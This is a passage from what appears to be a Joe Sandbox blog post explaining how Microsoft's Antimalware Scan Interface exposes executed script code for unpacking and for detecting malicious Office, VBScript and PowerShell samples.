We, therefore, thought there must be a better way. Enter the Microsoft Antimalware Scan Interface
AMSI in a Nutshell
AMSI is a generic interface standard that allows applications and services to integrate with any anti-malware product present on a machine. It basically enables to hook into a Windows interface which is also used by Windows Defender. Here is an image from the Microsoft Cloud Blog
outlining how AMSI works with Microsoft Office.
Behavior logs are mostly string buffers of executed code. In addition to Microsoft Office, AMSI also provides buffers for
- Wscript.exe, VBA Code
- Powershell.exe, PS1 Code
Here another one:
AMSI does not care about packing & unpacking and obfuscation. It will send all executed code as strings to the interface. As a result, AMSI is the perfect unpacker and deobfuscator. Malware cannot use AMSI as an indicator for evasion since AMSI runs on real targets as part of the Windows Defender. Approaches to disable or evade AMSI can be detected and serve as an additional malicious indicator.
. If we find one or a combination of such strings, the sample is considered malicious. If we do not find such strings, we will check each AMSI buffer for the strings. Please note that AMSI will send all code including the code passed to the eval
function. If we find a string, we will know for sure that the sample is malicious as well as packed. If we do not find any string, the sample is considered clean.
Joe Sandbox has detected the unpacking and displays the full unpacked code. Here the function of the script is to download a binary and then execute it.
You find the full analysis report here